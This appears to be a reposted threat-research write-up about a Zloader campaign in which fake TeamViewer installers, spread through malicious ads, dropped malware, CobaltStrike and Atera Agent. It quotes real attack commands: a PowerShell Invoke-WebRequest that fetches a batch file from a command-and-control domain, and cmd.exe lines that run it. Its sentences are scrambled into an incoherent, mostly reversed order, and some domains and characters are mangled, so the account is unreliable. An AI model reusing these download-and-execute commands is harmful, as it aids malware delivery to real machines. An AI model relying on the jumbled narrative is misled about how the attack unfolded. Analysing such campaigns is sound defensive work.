The downloaded script flash.bat executed a VBS script designed to bypass the user application control and elevate threat actor’s privileges. Powershell Invoke-WebRequest httpsclouds222com/t1m/index/processingSetRequestBat2/?servername=msi -OutFile flash.batĬ:\Windows\System32\cmd.exe" /c C:\Users\User\AppData\Roaming\internal\flash.bat
cmd.exe /C C:/Users/User/AppData/Roaming/internal/launch.bat Internal.exe launched an installation script that downloaded and executed additional malware from a Zloader command and control server, clouds222com. "C:\Program Files (x86)\TeamViewer Germany GmbH\TeamViewer\TeamViewer_Service.exe The malicious executable launched parallel to the legitimate TeamViewer application: "C:\Program Files (x86)\TeamViewer Germany GmbH\TeamViewer\internal.exe When the downloaded TeamViewer.msi ran, it wrote to disk a malicious executable named internal.exe. This command and control domain shared the same hosting IP address as the Zloader domain zoomvideoconferencecom at the time of our analysis. The malicious download was performed using the domain teamviewer-ucom. Unfortunately, this user accidentally clicked on a malicious advertisement, downloaded and then ran a malicious installation package called TeamViewer.msi. On Friday, December 10th, a user at an American automotive company attempted to install a remote access tool for their computer by Google searching “teamviewer download”. Given Sophos’s unique observations regarding initial access and the CobaltStrike beacon deployed, we wanted to publish our corresponding research. Shortly afterward Walmart GlobalTech detailed research into this attack campaign, including their findings that ‘infections are primarily located in the US and Europe’. Checkpoint first published details about how Zloader abuses CVE-2013-3900. Within the past month, two other organizations have shared research related to this campaign. MTR observed Zloader leveraging a known vulnerability in Windows that enabled appending malicious script content to digitally signed files provided by Microsoft, CVE-2013-3900.
The Sophos Managed Threat Response Team recently detected and responded to a Zloader campaign that delivered CobaltStrike and installed Atera Agent for permanent remote access. Over the last year, Zloader MSI files were disguised as installers for remote working applications such as Zoom, TeamViewer, and Discord. Zloader infects users by leveraging malicious web advertising to redirect users into downloading malicious MSI files. Zloader featured VNC remote access capabilities and was offered on the infamous Russian-speaking cybercrime forum exploitin. Recently, Egregor and Ryuk ransomware affiliates used Zloader for the initial point of entry. Zloader is a banking trojan with historical ties to the Zeus malware.
0 kommentar(er)
